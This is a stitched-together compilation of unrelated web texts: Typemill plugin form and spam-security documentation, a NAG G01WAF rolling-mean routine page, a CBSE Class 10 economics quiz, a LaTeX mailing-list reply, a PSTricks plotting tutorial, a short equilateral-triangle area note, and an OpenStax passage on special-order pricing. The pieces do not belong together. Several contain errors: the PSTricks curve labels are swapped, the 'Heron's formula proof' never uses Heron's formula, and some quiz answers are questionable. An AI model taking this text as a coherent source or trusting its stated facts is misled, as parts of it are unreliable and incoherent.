$formdata = $this->getFormdata('contactform');
if($formdata)
{
# process the formdata here, e.g. store them or send a mail
}
else
{
# get the public forms for the plugin
$contactform = $this->generateForm('contactform');
}
## #Spam Security
Spam is really annoying, so Typemill tries to exclude spam bots from public forms. If a spam bot is detected, then the method $this->getFormdata('myplugin') returns the keyword bot, so you should always add an extra if-else statement for this:
$formdata = $this->getFormdata('contactform');
if($formdata)
{
if($formdata == 'bot')
{
# add a message for the frontend here
}
else
{
# process the form-data
}
}
...
By default, Typemill adds a simple honeypot test to each form. Typemill also adds an option to activate Google reCAPTCHA for each form, so the user can decide in the settings of your plugin whether or not to use reCAPTCHA protection. You don't have to worry about that.
## #Security and Validation
On top of the spam protection, Typemill adds a CSRF check to each form. Additionally, Typemill validates all incoming data against the original form definition, so no additional data can be posted. Incoming data is validated with common rules; no HTML or other code characters will pass the validation. All error messages are added automatically, so you do not have to worry about them. It is strongly recommended that you use HTTPS connections for all public forms.
|
|
# NAG Library Routine Document G01WAF
Note: before using this routine, please read the Users' Note for your implementation to check the interpretation of bold italicised terms and other implementation-dependent details.
## 1 Purpose
G01WAF calculates the mean and, optionally, the standard deviation using a rolling window for an arbitrary-sized data stream.
## 2 Specification
SUBROUTINE G01WAF (M, NB, X, IWT, WT, PN, RMEAN, RSD, LRSD, RCOMM, LRCOMM, IFAIL)
INTEGER M, NB, IWT, PN, LRSD, LRCOMM, IFAIL
REAL (KIND=nag_wp) X(NB), WT(*), RMEAN(max(0,NB+min(0,PN-M+1))), RSD(LRSD), RCOMM(LRCOMM)
## 3 Description
Given a sample of $n$ observations, denoted by $x=\left\{{x}_{i}:i=1,2,\dots ,n\right\}$ and a set of weights, $w=\left\{{w}_{j}:j=1,2,\dots ,m\right\}$, G01WAF calculates the mean and, optionally, the standard deviation, in a rolling window of length $m$.
The mean is defined as
$\mu_i = \dfrac{\sum_{j=1}^{m} w_j x_{i+j-1}}{W}$ (1)
and the standard deviation as
$\sigma_i = \sqrt{\dfrac{\sum_{j=1}^{m} w_j \left(x_{i+j-1} - \mu_i\right)^2}{W - \sum_{j=1}^{m} w_j^2 / W}}$ (2)
with $W=\sum _{j=1}^{m}{w}_{j}$.
Four different types of weighting are possible:
(i) No weights (${w}_{j}=1$)
When no weights are required both the mean and standard deviations can be calculated in an iterative manner, with
$\mu_{i+1} = \mu_i + \dfrac{x_{i+m} - x_i}{m}, \qquad \sigma_{i+1} = \sigma_i + \left(x_{i+m} - \mu_i\right)^2 - \left(x_i - \mu_i\right)^2 - \dfrac{\left(x_{i+m} - x_i\right)^2}{m}$
where the initial values ${\mu }_{1}$ and ${\sigma }_{1}$ are obtained using the one pass algorithm of West (1979).
(ii) Each observation has its own weight
In this case, rather than supplying a vector of $m$ weights a vector of $n$ weights is supplied instead, $v=\left\{{v}_{j}:j=1,2,\dots ,n\right\}$ and ${w}_{j}={v}_{i+j-1}$ in (1) and (2).
If the standard deviations are not required then the mean is calculated using the iterative formula:
$W_{i+1} = W_i + v_{i+m} - v_i, \qquad \mu_{i+1} = \dfrac{W_i \mu_i + v_{i+m} x_{i+m} - v_i x_i}{W_{i+1}}$
where ${W}_{1}=\sum _{i=1}^{m}{v}_{i}$ and ${\mu }_{1}={W}_{1}^{-1}\sum _{i=1}^{m}{v}_{i}{x}_{i}$.
If both the mean and standard deviation are required then the one pass algorithm of West is applied multiple times.
(iii) Each position in the window has its own weight
This is the case as described in (1) and (2), where the weight given to each observation differs depending on which summary is being produced. When these types of weights are specified both the mean and standard deviation are calculated by applying the one pass algorithm of West multiple times.
(iv) Each position in the window has a weight equal to its position number (${w}_{j}=j$)
This is a special case of (iii).
If the standard deviations are not required then the mean is calculated using the iterative formula:
$S_{i+1} = S_i + x_{i+m} - x_i, \qquad \mu_{i+1} = \mu_i + \dfrac{2\left(m\, x_{i+m} - S_i\right)}{m\left(m+1\right)}$
where ${S}_{1}=\sum _{i=1}^{m}{x}_{i}$ and ${\mu }_{1}=2{\left({m}^{2}+m\right)}^{-1}{S}_{1}$.
If both the mean and standard deviation are required then the one pass algorithm of West is applied multiple times.
For large datasets, or where all the data is not available at the same time, $x$ (and if each observation has its own weight, $v$) can be split into arbitrary sized blocks and G01WAF called multiple times.
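As an illustration of the definitions in (1) and (2) only — not the one-pass updating algorithm the routine actually uses — a naive Python sketch of the rolling weighted mean and standard deviation might look like this:

```python
import math

def rolling_stats(x, w):
    """Rolling weighted mean and standard deviation over a window of
    length m = len(w), following equations (1) and (2):
    mu_i = sum(w_j * x_{i+j-1}) / W and
    sigma_i = sqrt(sum(w_j * (x_{i+j-1} - mu_i)**2) / (W - sum(w_j**2)/W)),
    with W = sum(w_j).  A reference sketch, recomputing each window."""
    m = len(w)
    W = sum(w)
    denom = W - sum(wj * wj for wj in w) / W
    means, sds = [], []
    for i in range(len(x) - m + 1):
        window = x[i:i + m]
        mu = sum(wj * xj for wj, xj in zip(w, window)) / W
        ss = sum(wj * (xj - mu) ** 2 for wj, xj in zip(w, window))
        means.append(mu)
        sds.append(math.sqrt(ss / denom))
    return means, sds

# Unweighted window of length 3 (w_j = 1) over a short series.
mu, sd = rolling_stats([1.0, 2.0, 3.0, 4.0], [1.0, 1.0, 1.0])
print(mu)  # [2.0, 3.0]
```

Note that for unit weights the denominator W - sum(w_j^2)/W reduces to m - 1, the usual sample-variance divisor.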
## 4 References
West D H D (1979) Updating mean and variance estimates: An improved method Comm. ACM 22 532–535
## 5 Parameters
1: M – INTEGER Input
On entry: $m$, the length of the rolling window.
If ${\mathbf{PN}}\ne 0$, M must be unchanged since the last call to G01WAF.
Constraint: ${\mathbf{M}}\ge 1$.
2: NB – INTEGER Input
On entry: $b$, the number of observations in the current block of data. The size of the block of data supplied in X (and when ${\mathbf{IWT}}=1$, WT) can vary; therefore NB can change between calls to G01WAF.
Constraints:
• ${\mathbf{NB}}\ge 0$;
• if ${\mathbf{LRCOMM}}=0$, ${\mathbf{NB}}\ge {\mathbf{M}}$.
3: X(NB) – REAL (KIND=nag_wp) array Input
On entry: the current block of observations, corresponding to ${x}_{\mathit{i}}$, for $\mathit{i}=k+1,\dots ,k+b$, where $k$ is the number of observations processed so far and $b$ is the size of the current block of data.
4: IWT – INTEGER Input
On entry: the type of weighting to use.
${\mathbf{IWT}}=0$
No weights are used.
${\mathbf{IWT}}=1$
Each observation has its own weight.
${\mathbf{IWT}}=2$
Each position in the window has its own weight.
${\mathbf{IWT}}=3$
Each position in the window has a weight equal to its position number.
If ${\mathbf{PN}}\ne 0$, IWT must be unchanged since the last call to G01WAF.
Constraint: ${\mathbf{IWT}}=0$, $1$, $2$ or $3$.
5: WT($*$) – REAL (KIND=nag_wp) array Input
Note: the dimension of the array WT must be at least ${\mathbf{NB}}$ if ${\mathbf{IWT}}=1$ and at least ${\mathbf{M}}$ if ${\mathbf{IWT}}=2$.
On entry: the user-supplied weights.
If ${\mathbf{IWT}}=1$, ${\mathbf{WT}}\left(\mathit{i}\right)={v}_{i}$, for $\mathit{i}=1,2,\dots ,n$.
If ${\mathbf{IWT}}=2$, ${\mathbf{WT}}\left(\mathit{j}\right)={w}_{j}$, for $\mathit{j}=1,2,\dots ,m$.
Otherwise, WT is not referenced.
Constraints:
• if ${\mathbf{IWT}}=1$, ${\mathbf{WT}}\left(\mathit{i}\right)\ge 0$, for $\mathit{i}=1,2,\dots ,{\mathbf{NB}}$;
• if ${\mathbf{IWT}}=2$, ${\mathbf{WT}}\left(1\right)\ne 0$ and ${\sum }_{i=1}^{m}{\mathbf{WT}}\left(i\right)>0$;
• if ${\mathbf{IWT}}=2$ and ${\mathbf{LRSD}}\ne 0$, ${\mathbf{WT}}\left(\mathit{i}\right)\ge 0$, for $\mathit{i}=1,2,\dots ,{\mathbf{M}}$.
6: PN – INTEGER Input/Output
On entry: $k$, the number of observations processed so far. On the first call to G01WAF, or when starting to summarise a new dataset, PN must be set to $0$.
If ${\mathbf{PN}}\ne 0$, it must be the same value as returned by the last call to G01WAF.
On exit: $k+b$, the updated number of observations processed so far.
Constraint: ${\mathbf{PN}}\ge 0$.
7: RMEAN($\mathrm{max}\phantom{\rule{0.125em}{0ex}}\left(0,{\mathbf{NB}}+\mathrm{min}\phantom{\rule{0.125em}{0ex}}\left(0,{\mathbf{PN}}-{\mathbf{M}}+1\right)\right)$) – REAL (KIND=nag_wp) array Output
On exit: ${\mu }_{\mathit{l}}$, the (weighted) moving averages, for $\mathit{l}=1,2,\dots ,b+\mathrm{min}\phantom{\rule{0.125em}{0ex}}\left(0,k-m+1\right)$. Where ${\mu }_{l}$ is the summary to the window that ends on ${\mathbf{X}}\left(l+m-\mathrm{min}\phantom{\rule{0.125em}{0ex}}\left(k,m-1\right)-1\right)$. Therefore, if, on entry, ${\mathbf{PN}}\ge {\mathbf{M}}-1$, ${\mathbf{RMEAN}}\left(l\right)$ is the summary corresponding to the window that ends on ${\mathbf{X}}\left(l\right)$ and if, on entry, ${\mathbf{PN}}=0$, ${\mathbf{RMEAN}}\left(l\right)$ is the summary corresponding to the window that ends on ${\mathbf{X}}\left({\mathbf{M}}+l-1\right)$ (or, equivalently, starts on ${\mathbf{X}}\left(l\right)$).
8: RSD(LRSD) – REAL (KIND=nag_wp) array Output
On exit: if ${\mathbf{LRSD}}\ne 0$ then ${\sigma }_{l}$, the (weighted) standard deviation. The ordering of RSD is the same as the ordering of RMEAN.
If ${\mathbf{LRSD}}=0$, RSD is not referenced.
9: LRSD – INTEGER Input
On entry: the dimension of the array RSD as declared in the (sub)program from which G01WAF is called. If the standard deviations are not required then LRSD should be set to zero.
Constraint: ${\mathbf{LRSD}}=0$ or ${\mathbf{LRSD}}\ge \mathrm{max}\phantom{\rule{0.125em}{0ex}}\left(0,{\mathbf{NB}}+\mathrm{min}\phantom{\rule{0.125em}{0ex}}\left(0,{\mathbf{PN}}-{\mathbf{M}}+1\right)\right)$.
10: RCOMM(LRCOMM) – REAL (KIND=nag_wp) array Communication Array
On entry: communication array, used to store information between calls to G01WAF. If ${\mathbf{LRCOMM}}=0$, RCOMM is not referenced and all the data must be supplied in one go.
11: LRCOMM – INTEGER Input
On entry: the dimension of the array RCOMM as declared in the (sub)program from which G01WAF is called.
Constraint: ${\mathbf{LRCOMM}}=0$ or ${\mathbf{LRCOMM}}\ge 2{\mathbf{M}}+20$.
12: IFAIL – INTEGER Input/Output
On entry: IFAIL must be set to $0$, $-1\text{ or }1$. If you are unfamiliar with this parameter you should refer to Section 3.3 in the Essential Introduction for details.
For environments where it might be inappropriate to halt program execution when an error is detected, the value $-1\text{ or }1$ is recommended. If the output of error messages is undesirable, then the value $1$ is recommended. Otherwise, if you are not familiar with this parameter, the recommended value is $0$. When the value $-\mathbf{1}\text{ or }\mathbf{1}$ is used it is essential to test the value of IFAIL on exit.
On exit: ${\mathbf{IFAIL}}={\mathbf{0}}$ unless the routine detects an error or a warning has been flagged (see Section 6).
## 6 Error Indicators and Warnings
If on entry ${\mathbf{IFAIL}}={\mathbf{0}}$ or $-{\mathbf{1}}$, explanatory error messages are output on the current error message unit (as defined by X04AAF).
Errors or warnings detected by the routine:
${\mathbf{IFAIL}}=11$
On entry, ${\mathbf{M}}=⟨\mathit{\text{value}}⟩$.
Constraint: ${\mathbf{M}}\ge 1$.
${\mathbf{IFAIL}}=12$
On entry, ${\mathbf{M}}=⟨\mathit{\text{value}}⟩$.
On entry at previous call, ${\mathbf{M}}=⟨\mathit{\text{value}}⟩$.
Constraint: if ${\mathbf{PN}}>0$, M must be unchanged since previous call.
${\mathbf{IFAIL}}=21$
On entry, ${\mathbf{NB}}=⟨\mathit{\text{value}}⟩$.
Constraint: ${\mathbf{NB}}\ge 0$.
${\mathbf{IFAIL}}=22$
On entry, ${\mathbf{NB}}=⟨\mathit{\text{value}}⟩$, ${\mathbf{M}}=⟨\mathit{\text{value}}⟩$.
Constraint: if ${\mathbf{LRCOMM}}=0$, ${\mathbf{NB}}\ge {\mathbf{M}}$.
${\mathbf{IFAIL}}=41$
On entry, ${\mathbf{IWT}}=⟨\mathit{\text{value}}⟩$.
Constraint: ${\mathbf{IWT}}=0$, $1$, $2$ or $3$.
${\mathbf{IFAIL}}=42$
On entry, ${\mathbf{IWT}}=⟨\mathit{\text{value}}⟩$.
On entry at previous call, ${\mathbf{IWT}}=⟨\mathit{\text{value}}⟩$.
Constraint: if ${\mathbf{PN}}>0$, IWT must be unchanged since previous call.
${\mathbf{IFAIL}}=51$
On entry, ${\mathbf{WT}}\left(⟨\mathit{\text{value}}⟩\right)=⟨\mathit{\text{value}}⟩$.
Constraint: ${\mathbf{WT}}\left(i\right)\ge 0$.
${\mathbf{IFAIL}}=52$
On entry, ${\mathbf{WT}}\left(1\right)=⟨\mathit{\text{value}}⟩$.
Constraint: if ${\mathbf{IWT}}=2$, ${\mathbf{WT}}\left(1\right)>0$.
${\mathbf{IFAIL}}=53$
On entry, at least one window had all zero weights.
${\mathbf{IFAIL}}=54$
On entry, unable to calculate at least one standard deviation due to the weights supplied.
${\mathbf{IFAIL}}=55$
On entry, sum of weights supplied in WT is $⟨\mathit{\text{value}}⟩$.
Constraint: if ${\mathbf{IWT}}=2$, the sum of the weights $>0$.
${\mathbf{IFAIL}}=61$
On entry, ${\mathbf{PN}}=⟨\mathit{\text{value}}⟩$.
Constraint: ${\mathbf{PN}}\ge 0$.
${\mathbf{IFAIL}}=62$
On entry, ${\mathbf{PN}}=⟨\mathit{\text{value}}⟩$.
On exit from previous call, ${\mathbf{PN}}=⟨\mathit{\text{value}}⟩$.
Constraint: if ${\mathbf{PN}}>0$, PN must be unchanged since previous call.
${\mathbf{IFAIL}}=91$
On entry, ${\mathbf{LRSD}}=⟨\mathit{\text{value}}⟩$.
Constraint: ${\mathbf{LRSD}}=0$ or ${\mathbf{LRSD}}\ge ⟨\mathit{\text{value}}⟩$.
${\mathbf{IFAIL}}=101$
RCOMM has been corrupted between calls.
${\mathbf{IFAIL}}=111$
On entry, ${\mathbf{LRCOMM}}=⟨\mathit{\text{value}}⟩$.
Constraint: ${\mathbf{LRCOMM}}\ge ⟨\mathit{\text{value}}⟩$.
${\mathbf{IFAIL}}=-999$
Dynamic memory allocation failed.
## 7 Accuracy
Not applicable.
## 8 Further Comments
The more data that is supplied to G01WAF in one call, i.e., the larger NB is, the more efficient the routine will be. In addition, where possible, the input parameters should be chosen so that G01WAF can use the iterative formulae described in Section 3.
## 9 Example
This example calculates Spencer's $15$-point moving average for the change in rate of the Earth's rotation between $1821$ and $1850$. The data is supplied in three chunks, the first consisting of five observations, the second $10$ observations and the last $15$ observations.
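For reference, the classical Spencer 15-point weights (which sum to 320) can be applied directly. This pure-Python sketch shows only the arithmetic of the weighted moving average, not the call to G01WAF itself:

```python
# Spencer's 15-point moving-average weights (they sum to 320).
spencer = [-3, -6, -5, 3, 21, 46, 67, 74, 67, 46, 21, 3, -5, -6, -3]
W = sum(spencer)  # 320

def spencer_ma(x):
    """Weighted moving average with Spencer's 15-point weights,
    equivalent to the IWT=2 positional-weight case of equation (1)."""
    m = len(spencer)
    return [sum(w * v for w, v in zip(spencer, x[i:i + m])) / W
            for i in range(len(x) - m + 1)]

# On a constant series the average reproduces the constant exactly.
print(spencer_ma([2.0] * 20)[0])  # 2.0
```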
### 9.1 Program Text
Program Text (g01wafe.f90)
### 9.2 Program Data
Program Data (g01wafe.d)
### 9.3 Program Results
Program Results (g01wafe.r)
This example plot shows the smoothing effect of using different length rolling windows on the mean and standard deviation. Two different window lengths, $m=5$ and $10$, are used to produce the unweighted rolling mean and standard deviations for the change in rate of the Earth's rotation between $1821$ and $1850$.
|
|
# MCQ Questions for CBSE Class 10 Economics Quiz with Answers
Students can practice the MCQ Questions for Class 10 Economics to test their conceptual knowledge and improve in weak areas accordingly. CBSE Class 10th Economics Mock Test over here will improve your overall skills in the subject.
## Multiple Choice Questions for Class 10th Economics Quiz with Answers
Practice using the Economics Grade 10 MCQ Questions Quiz by simply clicking on the conceptwise links mentioned below.
### Consumer Rights Questions and Answers
Which day is known as 'National Consumer's Day' ? 24th December
Consumer must be provided with accurate information about quality, purity, price, quantity and the standard of the goods and services. What right of a consumer is this?
Right to be informed
Which day of the following is celebrated as World Consumer Day? 15th March
"Jago Grahak Jago" is an initiative towards _______________. consumer education and awareness
When was COPRA enacted? 1986
What is the full form of BIS? Bureau of Indian Standards
The state level consumer court deals in cases involving claims between ______ to _______ . 20 lakhs, 1 crore
MRP of the product falls under the category of _____. Right to information
What is the full form of MRP? maximum retail price
Right to Information Act was enacted by the Government of India in _______. October 2005
#### Development Class 10 Economics MCQ Quiz
Different persons have different aspirations about the development because __________.
Life circumstances are different
Economic development by maintaining the natural resources for present and future use is known as ------------- Sustainable development
Economic development of a region depends on ________________________. All of the above
HDI stands for _______________. Human Development Index
Agriculture contributes nearly _________ of the GDP in India. 14%
The rise in per capita income in the Seventh Five Year Plan was _____. 3.7%
Which of the following is a low-Income country? South Africa
What is/are the major long-term objective/s of Indian planning? All of these
Which of the following is a developed country? America
Which one of the following statements appropriately describes the "fiscal stimulus"? It is an intense affirmative action of the Government to boost economic activity in the country
### Globalisation And The Indian Economy Questions and Answers
Globalisation And The Indian Economy Quiz Question Answer
Which of the following refers to trade barrier in the context of WTO?
II. Not allowing companies to do foreign trade beyond specific quantity.
III. Restrictions on the import and export of goods.
IV. Restrictions on the price fixed by companies.
III and IV
State whether the following statements are True or False.
Newspaper, magazines are means of mass communication.
True
The most common route for investments by MNCs in countries around the world is to ___________.
The first international earth summit was held in the year __________. 1992
What is the full form of NIEO? New International Economic Order
Liberalization means _______. removing trade barriers.
How can government of a country play a major role in making Globalization fairer? All of them
Which of the following events led to a change in the world economy? All of these
Which country has the largest share of FDI in India during the last decade? Mauritius
In India, the first plant set up by Ford Motors was in ____________. Chennai
### Money And Credit Questions and Answers
Money And Credit Quiz Question Answer
_________ costs of borrowing increase the debt-burden.
Higher
In rural areas farmers take credit for _____. Crop production
First gold coins were introduced during the reign of _____. Gupta
A 'debt trap' means _____. not able to repay credit amount
Which of the following is the main source of credit for the rich household? Formal Sector
Cheque is a _____. optional money
Since money acts as an intermediate in the exchange process, it is called _____. medium of exchange
What is the name of the success story that met the credit needs of the poor, at reasonable rates, in Bangladesh? Grameen Bank
Formal sources of credit do not include _____. employers
Modern forms of money include ________. paper notes
### Sectors Of The Indian Economy Questions and Answers
Sectors Of The Indian Economy Quiz Question Answer
This kind of Underemployment is hidden in contrast to someone who does not have a job and is clearly visible as unemployed. It is also called _______ Disguised unemployment
Employment in the service sector increased to the same extent as production.
False
In terms of GDP the share of tertiary sector in 2003 is _________.
between 50 per cent to 60 per cent
Which among the following statements is/are true about MGNREGA 2005?
All of the above
It has been noted from the histories of many, now developed, countries that at initial stages of development ____________ sector was the most important sector of economic activity.
Primary
The____________is characterized by small and scattered units which are largely outside the control of the government. Unorganised Sector
The secondary sector is also called __________ Industrial sector
Choose the odd one out from the following: Tourist Guide
___________ is the total sum of the value of the final goods and services of the Primary, Secondary and Tertiary sectors of the economy of a country produced during a year.
Gross Domestic Product
Which of the following sector contributes the most towards the GDP in India? Tertiary
### CBSE Class 10th Economics Sample Paper MCQ Questions with Answers
Free CBSE 10th Standard Economics Exam Mock Test will be of great help with all the concepts and subtopics in the subject. Identify your strengths and weaknesses by attempting the Social Science Economics Grade 10 Practice Questions and improve your scores in final exams. Get to know the Pattern of Questions that is being asked by solving the CBSE Class 10th Economics MCQ Quiz and build a stronger understanding of the subject.
### Importance of MCQExams.com Provided CBSE Class 10 Economics MCQ Quiz with Answers
Below are the reasons why you should opt for the CBSE Grade 10 Social Science Economics Practice Questions provided by us:
• With ample practice using the MCQs for Class 10th Social Science Economics you will slowly and steadily develop a deeper understanding of the concepts.
• Class 10 Economics MCQ Quiz with Answers will boost the self esteem and thus help you face the actual exams with confidence.
• You will no longer feel difficulty in finding the perfect resources for your study plan with our Chapterwise 10th Standard Economics Multiple Choice Question and Answers.
• The CBSE Grade 10 Social Science Economics Question Bank will definitely be of help to you in your journey of preparing for academic or competitive exams.
### Conclusion
We as a team hope the information shared regarding the MCQ Questions for Class 10th Social Science Economics has enlightened you. Please refer to the MCQs for other subjects as well on our site and study to score. Stay tuned for more updates on all preparation-related resources such as study material, revision notes, homework help, etc. Downloading multiple-choice questions for all subjects for CBSE Classes 12, 11, 10, 9, 8, 7, 6, 5, 4, 3, 2, and 1 is very easy from MCQExams.com.
|
|
# [texhax] Q: howto put image in heading?
Philip G. Ratcliffe philip.ratcliffe at uninsubria.it
Fri Feb 23 12:18:00 CET 2007
> On 22/02/07, D. R. Evans <doc.evans at gmail.com> wrote:
> > The subject pretty much says it all: I need to include a small image
> > in a heading. Can anyone point me to an example of how to do this?
\documentclass{article}
\usepackage{graphicx}
\begin{document}
\section{\protect\includegraphics[height=2ex]{figurefile}}
\end{document}
Is this what you want?
Cheers, Phil
|
|
PSTricks - Graphics for TeX and LaTeX
Welcome to the PSTricks web site
pst-plot -- Introduction
You can download the complete LaTeX example file or the PDF. This page is a general introduction.
In LaTeX preamble write:
\usepackage{pst-plot}
It is possible to put all of the plots in one or more floats.
Some exponential functions
The code for this is:
\psset{unit=1cm}
\begin{pspicture}(-4,-0.5)(4,8)
\psgrid[subgriddiv=0,griddots=5,gridlabels=7pt](-4,-0.5)(4,8)
\psline[linewidth=1pt]{->}(-4,0)(+4,0)
\psline[linewidth=1pt]{->}(0,-0.5)(0,8)
\psplot[plotstyle=curve,linewidth=1.5pt]{-4}{0.9}{10 x exp}% postscript function
\rput[l](1,7.5){$10^x$}
\psplot[plotstyle=curve,linewidth=1.5pt]{-4}{3}{2 x exp}% postscript function
\rput[l](2.2,7.5){$e^x$}
\psplot[plotstyle=curve,linewidth=1.5pt]{-4}{2.05}{2.7183 x exp}% postscript function
\rput[l](3.2,7.5){$2^x$}
\end{pspicture}
The commands:
\psset{unit=1cm}
% factor for the x and y-unit
%
\begin{pspicture}(-4,-0.5)(4,8)
% defines the area which is reserved for the picture,
% it's from the lower left to the upper right corner.
% Means a x-width of 8 and a y-width of 8.5
%
\psgrid[subgriddiv=0,griddots=5,gridlabels=7pt](-4,-0.5)(4,8)
% the grid with a subgriddepth of 1 unit, 10 dots per grid
% and the labels with a size of 7pt. The grid goes from lower
% left to upper right of the complete pspicture-area.
%
\psline[linewidth=1pt]{->}(-4,0)(+4,0)
% the x-axis
%
\psline[linewidth=1pt]{->}(0,-0.5)(0,8)
% the y-axis
%
\psplot[plotstyle=curve,linewidth=1.5pt]{-4}{0.9}{10 x exp}% postscript function
% plots the function 10^x for (-4<x<0.9) as a curve with
% a linewidth of 1.5pt.
%
\rput[l](1,7.5){$10^x$}
% puts in mathmode ($...$) the function name as text beside the curve.
%
\psplot[plotstyle=curve,linewidth=1.5pt]{-4}{3}{2 x exp}% postscript function
% plots the function 2^x for (-4<x<3) as a curve with
% a linewidth of 1.5pt.
%
\rput[l](2.2,7.5){$e^x$}
% s.a.
%
\psplot[plotstyle=curve,linewidth=1.5pt]{-4}{2.05}{2.7183 x exp}% postscript function
% plots the function e^x for (-4<x<2.05) as a curve
% with a linewidth of 1.5pt.
%
\rput[l](3.2,7.5){$2^x$}
% s.a.
%
\end{pspicture}
Another plot (only for information).
log functions (inverse exponential functions)
LaTeX Source
PostScript has no tan(x) function of its own, therefore we must build the quotient of sin(x) and cos(x) with x sin x cos div, which means:
- build sin of angle x and put the value on the stack
- build cos of angle x and put the value on the stack
- build the quotient (divide) of the last two stack elements.
Figure 1: tan(x) function in a float
|
|
Proof for Heron's formula for an equilateral triangle.
We know that the area of a triangle is 1/2 × base × height. Take an equilateral triangle ABC with side m units and altitude AD to the base BC; let AD = n units. In the right-angled triangle ABD, AB = m and BD = m/2. By the Pythagorean theorem, AD² + BD² = AB², i.e. n² + (m/2)² = m², so n² = m² − m²/4 = 3m²/4, giving n = (√3/2)m. Hence the area of triangle ABC = 1/2 × base × height = 1/2 × m × (√3/2)m = (√3/4)m².
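The same result follows directly from Heron's formula: with sides a = b = c = m, the semiperimeter is s = 3m/2, and

```latex
\text{Area} = \sqrt{s(s-a)(s-b)(s-c)}
            = \sqrt{\frac{3m}{2}\cdot\frac{m}{2}\cdot\frac{m}{2}\cdot\frac{m}{2}}
            = \sqrt{\frac{3m^{4}}{16}}
            = \frac{\sqrt{3}}{4}\,m^{2},
```

which matches the base-times-height computation above.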
Note by Ksg Sarma
2 years, 6 months ago
|
|
Principles of Accounting, Volume 2: Managerial Accounting
# 10.2Evaluate and Determine Whether to Accept or Reject a Special Order
Both manufacturing and service companies often receive requests to fill special orders. These special orders are typically for goods or services at a reduced price and are usually a one-time order that, in the short-run, does not affect normal sales. When deciding whether to accept a special order, management must consider several factors:
• The capacity required to fulfill the special order
• Whether the price offered by the buyer will cover the cost of producing the products
• The role of fixed costs in the analysis
• Qualitative factors
• Whether the order will violate the Robinson-Patman Act and other fair pricing legislation
### Fundamentals of the Decision to Accept or Reject a Special Order
The starting point for making this decision is to assess the company’s normal production capacity. The normal capacity is the production level a company can achieve without adding additional production resources, such as additional equipment or labor. For example, if the company can produce 10,000 towels a month based on its current production capacity, and it is currently contracted to produce 9,000 a month, it could not take on a special one-time order for 3,000 towels without adding additional equipment or workers. Most companies do not work at maximum capacity; rather, they function at normal capacity, which is a concept related to a company’s relevant range. The relevant range is the quantitative range of units that can be produced based on the company’s current productive assets. These assets can include equipment capacity or its labor capacity. Labor capacity is typically easier to increase on a short-term basis than equipment capacity. The following example assumes that labor capacity is available, so only equipment capacity is considered in the example.
Assume that based on a company’s present equipment, it can produce 20,000 units a month. Its relevant range of production would be zero to 20,000 units a month. As long as the units of production fall within this range, it does not need additional equipment. However, if it wanted to increase production from 20,000 units to 24,000 units, it would need to buy or lease additional equipment. If production is fewer than 20,000 units, the company would have unused capacity that could be used to produce additional units for its current customers or for new clients.
If the company does not have the capacity to produce a special order, it will have to reduce production of another good or service in order to fulfill the special order or provide another means of producing the goods, such as hiring temporary workers, running an additional shift, or securing additional equipment. As you will learn, not having the capacity to fill the special order will create a different analysis than it would if there is sufficient capacity.
Next, management must determine if the price offered by the buyer will result in enough revenue to cover the differential costs of producing the items. For example, if price does not meet the variable costs of production, then accepting the special order would be an unprofitable decision.
Additionally, fixed costs may be relevant if the company is already operating at capacity, as there may be additional fixed costs, such as the need to run an extra shift, hire an additional supervisor, or buy or lease additional equipment. If the company is not operating at capacity—in other words, the company has unused capacity—then the fixed costs are irrelevant to the decision if the special order can be met with this unused capacity.
Special orders create several qualitative issues. A logical issue is the concern for how existing customers will feel if they discover a lower price was offered to the special-order customer. A special order that might be profitable could be rejected if the company determined that accepting the special order could damage relations with current customers. If the goods in the special order are modified so that they are cheaper to manufacture, current customers may prefer the modified, cheaper version of the product. Would this hurt the profitability of the company? Would it affect the reputation?
In addition to these considerations, sometimes companies will take on a special order that will not cover costs based on qualitative assessments. For example, the business requesting the special order might be a potential client with whom the manufacturer has been trying to establish a business relationship and the producer is willing to take a one-time loss. However, our coverage of special orders concentrates on decisions based on quantitative factors.
Companies considering special orders must also be aware of the anti–price discrimination rules established in the Robinson-Patman Act. The Robinson-Patman Act is a federal law that was passed in 1936. Its primary intent is to prevent some forms of price discrimination in sales transactions between smaller and larger businesses.
### Sample Data
Franco, Inc., produces dental office examination chairs. Franco has the capacity to produce 5,000 chairs per year and currently is producing 4,000. Each chair retails for $2,800, and the costs to produce a single chair consist of direct materials of $750, direct labor of $600, and variable overhead of $300. Fixed overhead costs of $1,350,000 are met by selling the first 3,000 chairs. Franco has received a special order from Ghanem, Inc., to buy 800 chairs for $1,800. Should Franco accept the special order?
### Calculations Using Sample Data
Franco is not operating at capacity and the special order does not take them over capacity. Additionally, all the fixed costs have already been met. Therefore, when evaluating the special order, Franco must determine if the special offer price will meet and exceed the costs to produce the chairs. Figure 10.2 details the analysis.
Figure 10.2 Special Order: Supplier Has Excess Capacity. (attribution: Copyright Rice University, OpenStax, under CC BY-NC-SA 4.0 license)
Since Franco has already met his fixed costs with current production and since he has the capacity to produce the additional 800 units, Franco only needs to consider his variable costs for this order. Franco’s variable cost to produce one chair is $1,650. Ghanem is offering to buy the chairs for $1,800 apiece. By accepting the special order, Franco would meet his variable costs and make $150 per chair. Considering only quantitative factors, Franco should accept the special offer.

How would Franco’s decision change if the factory were already producing at capacity at the time of the special offer? In other words, assume the corporation is already producing the most it can produce without working more hours or adding more equipment. Accepting the order would likely mean that Franco would incur additional fixed costs. Assume that, to fill the order from Ghanem, Franco would have to run an extra shift, and this would require him to hire a temporary production manager at a cost of $90,000. Assume no other fixed costs would be incurred. Also assume Franco will incur additional costs related to maintenance and utilities for this extra shift and estimates those costs will be $70,000. As shown in Figure 10.3, in this scenario, Franco would have to charge Ghanem at least $1,850 per chair in order to meet his costs.
Figure 10.3 Special Order: Supplier Does Not Have Excess Capacity. (attribution: Copyright Rice University, OpenStax, under CC BY-NC-SA 4.0 license)
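The arithmetic behind both scenarios is small enough to sketch in code. The figures come from the example above; the variable and function names are ours.

```python
# Special-order analysis for the Franco example (figures from the text).

variable_cost = 750 + 600 + 300      # direct materials + direct labor + variable overhead
offer_price = 1800                   # Ghanem's offer per chair
order_size = 800

# Scenario 1: excess capacity -- fixed costs are already covered,
# so only the variable costs are relevant to the decision.
contribution_per_chair = offer_price - variable_cost
print(contribution_per_chair)        # 150, so accept on quantitative grounds

# Scenario 2: at capacity -- the extra shift adds fixed costs that
# the special order alone must absorb.
extra_fixed = 90_000 + 70_000        # temporary manager + maintenance/utilities
min_price = variable_cost + extra_fixed / order_size
print(min_price)                     # 1850.0, the minimum acceptable price per chair
```

Dividing the incremental fixed costs over only the 800 special-order chairs is what pushes the minimum price from $1,650 up to $1,850.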
### Final Analysis of the Decision
